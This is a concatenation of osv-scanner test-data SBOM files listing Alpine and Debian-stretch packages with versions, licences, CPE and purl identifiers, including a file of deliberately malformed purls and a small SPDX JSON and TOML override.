cpe:2.3:a:zlib:zlib:1.2.10-r0:*:*:*:*:*:*:* pkg:apk/alpine/zlib@1.2.10-r0?arch=x86_64&upstream=zlib&distro=alpine-3.17.2 https://zlib.net/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bb37266b06a72d21d1fd850ef4b86665cf9ef70f 110592 zlib so:libz.so.1=1.2.13 Q1rjnXT01l1PAxXheUxe4Oldl5rFk= so:libc.musl-x86_64.so.1 54258 alpine 3.17.2 Alpine Linux v3.17 https://gitlab.alpinelinux.org/alpine/aports/-/issues https://alpinelinux.org/ alpine Alpine Linux v3.17 3.17.2 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/sbom-insecure/bad-purls.cdx.xml ================================================ 2023-03-02T12:04:22+11:00 anchore syft 0.73.0 alpine:latest sha256:fd6275a37d2472b9d3be70c3261087b8d65e441c21342ae7313096312bcda2b3 Natanael Copa <ncopa@alpinelinux.org> 3.4.0-r0 Alpine base dir structure and init scripts GPL-2.0-only cpe:2.3:a:alpine-baselayout:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* pkg:apk/alpine/alpine-baselayout@3.4.0-r0?arch=x86_64&upstream=alpine-baselayout&distro=alpine-3.17.2 https://git.alpinelinux.org/cgit/aports/tree/main/alpine-baselayout apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-baselayout:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bd965a7ebf7fd8f07d7a0cc0d7375bf3e4eb9b24 331776 alpine-baselayout Q1/eXfmbYT1WXenFSqKjroYyK84NE= alpine-baselayout-data=3.4.0-r0 /bin/sh 8890 Natanael Copa <ncopa@alpinelinux.org> alpine-baselayout-data 3.4.0-r0 Alpine base dir structure and init scripts GPL-2.0-only cpe:2.3:a:alpine-baselayout-data:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* 
pkg:apk/alpine/alpine-baselayout-data@3.4.0-r0?arch=x86_64&upstream=alpine-baselayout&distro=alpine-3.17.2 apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-baselayout-data:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout_data:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout_data:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine-baselayout:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine-baselayout:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bd965a7ebf7fd8f07d7a0cc0d7375bf3e4eb9b24 77824 alpine-baselayout Q1/JgpM8J6DWI/541tUX+uHEzSjqo= 11664 Natanael Copa <ncopa@alpinelinux.org> alpine-keys 2.4-r1 Public keys for Alpine Linux packages MIT cpe:2.3:a:alpine-keys:alpine-keys:2.4-r1:*:*:*:*:*:*:* pkg:pypi/ https://alpinelinux.org apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-keys:alpine_keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine_keys:alpine-keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine_keys:alpine_keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_keys:2.4-r1:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed aab68f8c9ab434a46710de8e12fb3206e2930a59 159744 alpine-keys Q1KM01lfKVp+gEZn23awujqjSkrN8= 13361 Natanael Copa <ncopa@alpinelinux.org> apk-tools 2.12.10-r1 Alpine Package Keeper - package manager for alpine GPL-2.0-only cpe:2.3:a:apk-tools:apk-tools:2.12.10-r1:*:*:*:*:*:*:* pkg:apk/alpine/apk-tools@2.12.10-r1?arch=x86_64&upstream=apk-tools&distro=alpine-3.17.2 https://gitlab.alpinelinux.org/alpine/apk-tools apkdb-cataloger 
ApkMetadata apk cpe:2.3:a:apk-tools:apk_tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk_tools:apk-tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk_tools:apk_tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk:apk-tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk:apk_tools:2.12.10-r1:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 0188f510baadbae393472103427b9c1875117136 307200 apk-tools so:libapk.so.3.12.0=3.12.0 cmd:apk=2.12.10-r1 Q1Ef3iwt+cMdGngEgaFr2URIJhKzQ= musl>=1.2 ca-certificates-bundle so:libc.musl-x86_64.so.1 so:libcrypto.so.3 so:libssl.so.3 so:libz.so.1 120973 busybox 1.35.0 cpe:2.3:a:busybox:busybox:1.35.0:*:*:*:*:*:*:* binary-cataloger BinaryMetadata binary cpe:2.3:a:busybox:busybox:1.35.0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /bin/busybox Sören Tempel <soeren+alpine@soeren-tempel.net> busybox-binsh 1.36.1-r27 busybox ash /bin/sh GPL-2.0-only cpe:2.3:a:busybox-binsh:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* pkg:apk/alpine/busybox-binsh@1.36.1-r27?arch=x86_64&upstream=busybox&distro=alpine-3.17.2 https://busybox.net/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:busybox-binsh:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox_binsh:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox_binsh:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 1dbf7a793afae640ea643a055b6dd4f430ac116b 8192 busybox /bin/sh cmd:sh=1.36.1-r27 Q1miWwyhWKXVEiRYLhmArV1TKMs6A= busybox=1.36.1-r27 1547 Natanael Copa <ncopa@alpinelinux.org> ca-certificates-bundle 20220614-r4 Pre generated bundle of Mozilla certificates MPL-2.0 MIT cpe:2.3:a:ca-certificates-bundle:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* pkg:pypi/ https://www.mozilla.org/en-US/about/governance/policies/security-group/certs/ 
apkdb-cataloger ApkMetadata apk cpe:2.3:a:ca-certificates-bundle:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates_bundle:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates_bundle:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca-certificates:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca-certificates:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed e1839fd45a096c9e21ac24f8a61991d357d11628 237568 ca-certificates ca-certificates-cacert=20220614-r4 Q14PFUzkDXTGDcHkiuEdFuzb+EvxQ= 126296 Natanael Copa <ncopa@alpinelinux.org> libc-utils 0.7.2-r3 Meta package to pull in correct libc BSD-2-Clause BSD-3-Clause cpe:2.3:a:libc-utils:libc-utils:0.7.2-r3:*:*:*:*:*:*:* pkg:/// https://alpinelinux.org apkdb-cataloger ApkMetadata apk cpe:2.3:a:libc-utils:libc_utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc_utils:libc-utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc_utils:libc_utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc:libc-utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc:libc_utils:0.7.2-r3:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 60424133be2e79bbfeff3d58147a22886f817ce2 4096 libc-dev Q19Gg06pBPiiG9UN94ql7qImsHSUQ= musl-utils 1485 Ariadne Conill <ariadne@dereferenced.org> libcrypto3 3.0.8-r0 Crypto library from openssl Apache-2.0 cpe:2.3:a:libcrypto3:libcrypto3:3.0.8-r0:*:*:*:*:*:*:* pkg:apk/alpine/libcrypto3@3.0.8-r0?arch=x86_64&upstream=openssl&distro=alpine-3.17.2 https://www.openssl.org/ apkdb-cataloger ApkMetadata apk 
sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 524302e205a5b43c2bb48d041bcb10ccf2b480f9 4206592 openssl so:libcrypto.so.3=3 Q1lyWpurYeMlLEt60ys+OlTABmzgs= so:libc.musl-x86_64.so.1 1710217 Ariadne Conill <ariadne@dereferenced.org> libssl3 3.0.8-r0 SSL shared libraries Apache-2.0 cpe:2.3:a:libssl3:libssl3:3.0.8-r0:*:*:*:*:*:*:* pkg:apk/alpine/libssl3@3.0.8-r0?arch=x86_64&upstream=openssl&distro=alpine-3.17.2 https://www.openssl.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 524302e205a5b43c2bb48d041bcb10ccf2b480f9 622592 openssl so:libssl.so.3=3 Q1Z6/d/FKYkPehWzNtOtYnJ74oIkY= so:libc.musl-x86_64.so.1 so:libcrypto.so.3 246853 Timo Teräs <timo.teras@iki.fi> musl 1.2.3-r4 the musl c library (libc) implementation MIT cpe:2.3:a:musl:musl:1.2.3-r4:*:*:*:*:*:*:* / https://musl.libc.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed f93af038c3de7146121c2ea8124ba5ce29b4b058 634880 musl so:libc.musl-x86_64.so.1=1 Q1Pk7x1woArbB1nzkMPJPq1TECwus= 388955 Timo Teräs <timo.teras@iki.fi> musl-utils 1.2.3-r4 the musl c library (libc) implementation MIT BSD-2-Clause GPL-2.0-or-later cpe:2.3:a:musl-utils:musl-utils:1.2.3-r4:*:*:*:*:*:*:* pkg:apk/alpine/musl-utils@1.2.3-r4?arch=x86_64&upstream=musl&distro=alpine-3.17.2 https://musl.libc.org/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:musl-utils:musl_utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl_utils:musl-utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl_utils:musl_utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl:musl-utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl:musl_utils:1.2.3-r4:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed f93af038c3de7146121c2ea8124ba5ce29b4b058 135168 musl cmd:getconf=1.2.3-r4 cmd:getent=1.2.3-r4 cmd:iconv=1.2.3-r4 cmd:ldconfig=1.2.3-r4 cmd:ldd=1.2.3-r4 
Q1ZWJL4eySx8nPSjF1FAJgQyvuNs4= scanelf so:libc.musl-x86_64.so.1 36697 Natanael Copa <ncopa@alpinelinux.org> scanelf 1.3.5-r1 Scan ELF binaries for stuff GPL-2.0-only cpe:2.3:a:scanelf:scanelf:1.3.5-r1:*:*:*:*:*:*:* pkg:apk/alpine/scanelf@1.3.5-r1?arch=x86_64&upstream=pax-utils&distro=alpine-3.17.2 https://wiki.gentoo.org/wiki/Hardened/PaX_Utilities apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed e52243dbb02069f10d48440ccc5fd41fa5fc2236 98304 pax-utils cmd:scanelf=1.3.5-r1 Q11dxYFsHvBFAzzHGDo5gOTDNJDyQ= so:libc.musl-x86_64.so.1 37687 Sören Tempel <soeren+alpine@soeren-tempel.net> ssl_client 1.36.1-r27 EXternal ssl_client for busybox wget GPL-2.0-only cpe:2.3:a:ssl-client:ssl-client:1.36.1-r27:*:*:*:*:*:*:* pkg:apk/alpine/@1.36.1-r27?arch=x86_64&upstream=busybox&distro=alpine-3.17.2 https://busybox.net/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:ssl-client:ssl_client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl_client:ssl-client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl_client:ssl_client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl:ssl-client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl:ssl_client:1.36.1-r27:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 1dbf7a793afae640ea643a055b6dd4f430ac116b 28672 busybox cmd:ssl_client=1.36.1-r27 Q1QuqZjeP6XG85I29tOiCWofL8Cj0= so:libc.musl-x86_64.so.1 so:libcrypto.so.3 so:libssl.so.3 4929 Natanael Copa <ncopa@alpinelinux.org> zlib 1.2.10-r0 A compression/decompression Library Zlib cpe:2.3:a:zlib:zlib:1.2.10-r0:*:*:*:*:*:*:* pkg:pypi/ https://zlib.net/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bb37266b06a72d21d1fd850ef4b86665cf9ef70f 110592 zlib so:libz.so.1=1.2.13 Q1rjnXT01l1PAxXheUxe4Oldl5rFk= so:libc.musl-x86_64.so.1 54258 3.17.2 Alpine Linux v3.17 alpine Alpine Linux v3.17 3.17.2 ================================================ 
FILE: cmd/osv-scanner/scan/source/testdata/sbom-insecure/only-unimportant.spdx.json ================================================ { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/1989157b-1458-4e57-abcb-fbec4a542b9c", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "2025-08-26T01:01:15Z" }, "packages": [ { "name": "libpcre3", "SPDXID": "SPDXRef-Package-libpcre3-9f1e7f2f-24ab-4eb2-8be4-7d3be9403a72", "versionInfo": "2:8.39-12ubuntu0.1", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the os/dpkg extractor from var/lib/dpkg/status", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:deb/ubuntu/pcre3@2%3A8.39-12ubuntu0.1?arch=amd64\u0026distro=focal\u0026source=pcre3" } ] } ], "relationships": [ ] } ================================================ FILE: cmd/osv-scanner/scan/source/testdata/sbom-insecure/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/scan/source/testdata/sbom-insecure/postgres-stretch.cdx.xml ================================================ 2023-03-02T12:00:49+11:00 anchore syft 0.73.0 postgres:11.15-stretch sha256:84ac18036f93e18c3d8165e4fd9d9885924bb71beeab042dd50443d4f88fcdda Debian Adduser Developers <adduser-devel@lists.alioth.debian.org> adduser 3.115 GPL-2.0-only cpe:2.3:a:adduser:adduser:3.115:*:*:*:*:*:*:* pkg:deb/debian/adduser@3.115?arch=all&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/adduser/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/adduser.conffiles 
sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/adduser.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 849 APT Development Team <deity@lists.debian.org> apt 1.4.11 GPL-2.0-only GPLv2+ cpe:2.3:a:apt:apt:1.4.11:*:*:*:*:*:*:* pkg:deb/debian/apt@1.4.11?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/apt/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/apt.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/apt.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 3539 Santiago Vila <sanvila@debian.org> base-files 9.9+deb9u13 GPL cpe:2.3:a:base-files:base-files:9.9\+deb9u13:*:*:*:*:*:*:* pkg:deb/debian/base-files@9.9+deb9u13?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:base-files:base_files:9.9\+deb9u13:*:*:*:*:*:*:* cpe:2.3:a:base_files:base-files:9.9\+deb9u13:*:*:*:*:*:*:* cpe:2.3:a:base_files:base_files:9.9\+deb9u13:*:*:*:*:*:*:* cpe:2.3:a:base:base-files:9.9\+deb9u13:*:*:*:*:*:*:* cpe:2.3:a:base:base_files:9.9\+deb9u13:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/base-files/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/base-files.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/base-files.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 333 Colin Watson <cjwatson@debian.org> base-passwd 3.5.43 GPL-2.0-only PD cpe:2.3:a:base-passwd:base-passwd:3.5.43:*:*:*:*:*:*:* pkg:deb/debian/base-passwd@3.5.43?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb 
cpe:2.3:a:base-passwd:base_passwd:3.5.43:*:*:*:*:*:*:* cpe:2.3:a:base_passwd:base-passwd:3.5.43:*:*:*:*:*:*:* cpe:2.3:a:base_passwd:base_passwd:3.5.43:*:*:*:*:*:*:* cpe:2.3:a:base:base-passwd:3.5.43:*:*:*:*:*:*:* cpe:2.3:a:base:base_passwd:3.5.43:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/base-passwd/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/base-passwd.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 229 Matthias Klose <doko@debian.org> bash 4.4-5 GPL-3.0-only cpe:2.3:a:bash:bash:4.4-5:*:*:*:*:*:*:* pkg:deb/debian/bash@4.4-5?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/bash/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/bash.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/bash.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 5798 Debian util-linux Maintainers <ah-util-linux@debian.org> bsdutils 1:2.29.2-1+deb9u1 BSD-2-Clause BSD-3-Clause BSD-4-Clause GPL-2.0-only GPL-2.0-or-later GPL-3.0-only GPL-3.0-or-later LGPL LGPL-2.0-only LGPL-2.0-or-later LGPL-2.1-only LGPL-2.1-or-later LGPL-3.0-only LGPL-3.0-or-later MIT public-domain cpe:2.3:a:bsdutils:bsdutils:1\:2.29.2-1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/bsdutils@1:2.29.2-1+deb9u1?arch=amd64&upstream=util-linux%402.29.2-1+deb9u1&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/bsdutils/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/bsdutils.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 238 util-linux 
2.29.2-1+deb9u1 Michael Stone <mstone@debian.org> coreutils 8.26-3 GPL-3.0-only cpe:2.3:a:coreutils:coreutils:8.26-3:*:*:*:*:*:*:* pkg:deb/debian/coreutils@8.26-3?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/coreutils/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/coreutils.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 15103 Gerrit Pape <pape@smarden.org> dash 0.5.8-2.4 GPL cpe:2.3:a:dash:dash:0.5.8-2.4:*:*:*:*:*:*:* pkg:deb/debian/dash@0.5.8-2.4?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/dash/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/dash.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 204 Debconf Developers <debconf-devel@lists.alioth.debian.org> debconf 1.5.61 BSD-2-Clause cpe:2.3:a:debconf:debconf:1.5.61:*:*:*:*:*:*:* pkg:deb/debian/debconf@1.5.61?arch=all&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/debconf/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/debconf.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/debconf.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 558 Debian Release Team <packages@release.debian.org> debian-archive-keyring 2017.5+deb9u2 GPL cpe:2.3:a:debian-archive-keyring:debian-archive-keyring:2017.5\+deb9u2:*:*:*:*:*:*:* pkg:deb/debian/debian-archive-keyring@2017.5+deb9u2?arch=all&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb 
cpe:2.3:a:debian-archive-keyring:debian_archive_keyring:2017.5\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:debian_archive_keyring:debian-archive-keyring:2017.5\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:debian_archive_keyring:debian_archive_keyring:2017.5\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:debian-archive:debian-archive-keyring:2017.5\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:debian-archive:debian_archive_keyring:2017.5\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:debian_archive:debian-archive-keyring:2017.5\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:debian_archive:debian_archive_keyring:2017.5\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:debian:debian-archive-keyring:2017.5\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:debian:debian_archive_keyring:2017.5\+deb9u2:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/debian-archive-keyring/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/debian-archive-keyring.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/debian-archive-keyring.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 189 Clint Adams <clint@debian.org> debianutils 4.8.1.1 GPL cpe:2.3:a:debianutils:debianutils:4.8.1.1:*:*:*:*:*:*:* pkg:deb/debian/debianutils@4.8.1.1?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/debianutils/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/debianutils.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 213 Santiago Vila <sanvila@debian.org> diffutils 1:3.5-3 GFDL GPL cpe:2.3:a:diffutils:diffutils:1\:3.5-3:*:*:*:*:*:*:* pkg:deb/debian/diffutils@1:3.5-3?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 
/usr/share/doc/diffutils/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/diffutils.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 1327 Debian GnuPG Maintainers <pkg-gnupg-maint@lists.alioth.debian.org> dirmngr 2.1.18-8~deb9u4 BSD-3-Clause Expat GPL-3.0-only GPL-3.0-or-later LGPL-2.1-only LGPL-2.1-or-later LGPL-3.0-only LGPL-3.0-or-later RFC-Reference TinySCHEME permissive cpe:2.3:a:dirmngr:dirmngr:2.1.18-8\~deb9u4:*:*:*:*:*:*:* pkg:deb/debian/dirmngr@2.1.18-8~deb9u4?arch=amd64&upstream=gnupg2&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/dirmngr/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/dirmngr.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 1088 gnupg2 Dpkg Developers <debian-dpkg@lists.debian.org> dpkg 1.18.25 BSD-2-Clause GPL-2.0-only GPL-2.0-or-later public-domain-md5 public-domain-s-s-d cpe:2.3:a:dpkg:dpkg:1.18.25:*:*:*:*:*:*:* pkg:deb/debian/dpkg@1.18.25?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/dpkg/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/dpkg.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/dpkg.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 6778 Theodore Y. 
